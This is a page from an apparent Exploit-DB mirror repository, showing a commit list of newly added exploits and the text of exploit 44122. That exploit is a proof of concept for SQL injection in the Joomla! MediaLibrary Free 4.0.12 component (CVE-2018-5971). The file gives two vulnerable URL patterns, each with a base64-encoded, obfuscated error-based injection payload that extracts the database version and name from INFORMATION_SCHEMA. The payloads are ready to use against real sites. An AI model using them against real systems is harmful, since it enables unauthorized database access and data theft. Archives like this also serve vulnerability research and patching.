bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44122.txt
Offensive Security ed38447971 DB: 2018-02-17 
45 changes to exploits/shellcodes

Microsoft Edge - 'UnmapViewOfFile' ACG Bypass
JBoss Remoting 6.14.18 - Denial of Service
Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service

ABRT - raceabrt Privilege Escalation(Metasploit)

Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection
Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection

Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
EPIC MyChart - SQL Injection
TV - Video Subscription - Authentication Bypass SQL Injection
UserSpice 4.3 - Blind SQL Injection
Twig < 2.4.4 - Server Side Template Injection
Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting
Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection
Joomla! Component Aist 2.0 - 'id' SQL Injection
Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection
Joomla! Component DT Register 3.2.7 - 'id' SQL Injection
Joomla! Component Fastball 2.5 - 'season' SQL Injection
Joomla! Component File Download Tracker 3.0 - SQL Injection
Joomla! Component Form Maker 3.6.12 - SQL Injection
Joomla! Component Gallery WD 1.3.6 - SQL Injection
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection
Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection
Joomla! Component jGive 2.0.9 - SQL Injection
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
Joomla! Component JS Autoz 1.0.9 - SQL Injection
Joomla! Component JS Jobs 1.1.9 - SQL Injection
Joomla! Component JTicketing 2.0.16 - SQL Injection
Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
Joomla! Component NeoRecruit 4.1 - SQL Injection
Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Joomla! Component Realpin 1.5.04 - SQL Injection
Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Joomla! Component Solidres 2.5.1 - SQL Injection
Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection
Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
Joomla! Component Saxum Astro 4.0.14 - SQL Injection
Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
Joomla! Component SquadManagement 1.0.3 - SQL Injection
Joomla! Component Saxum Picker 3.2.10 - SQL Injection
Front Accounting ERP 2.4.3 - Cross-Site Request Forgery
PHIMS - Hospital Management Information System - 'Password' SQL Injection
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting
2018-02-17 05:01:49 +00:00

26 lines
No EOL
1.5 KiB
Text
Raw Blame History

# # # #
# Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://ordasoft.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
# Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
# Version: 4.0.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5971
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
# MStBTkQoU0VMRUNUKzErRlJPTShTRUxFQ1QrQ09VTlQoKiksQ09OQ0FUKChTRUxFQ1QrKFNFTEVDVCtDT05DQVQoQ0FTVChWRVJTSU9OKCkrQVMrQ0hBUiksMHg3ZSkpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUytMSU1JVCswLDEpLEZMT09SKFJBTkQoMCkqMikpeCtGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrR1JPVVArQlkreClhKStBTkQrMT0x
#
# 2)
# http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
# NjMgQW5EKygvKiE0NDQ1NXNFbGVDVCovKzB4MzErLyohNDQ0NTVGck9NKi8rKC8qITQ0NDU1c0VsZUNUKi8rY09VTlQoKiksLyohNDQ0NTVDb05DQXQqLygoLyohNDQ0NTVzRWxlQ1QqLygvKiE0NDQ1NXNFbGVDVCovKy8qITQ0NDU1Q29OQ0F0Ki8oY0FzdChkQVRBQkFTRSgpK0FzK2NoYXIpLDB4N2UpKSsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudGFibGVzKy8qITQ0NDU1V2hlckUqLyt0YWJsZV9zY2hlbWE9ZEFUQUJBU0UoKStsaW1pdCswLDEpLGZsb29yKHJhTkQoMCkqMikpeCsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudEFCTEVTKy8qITQ0NDU1Z1JPVVAqLytiWSt4KWEpK2FORCsxPTE=
#
# # # #
Reference in a new issue View git blame Copy permalink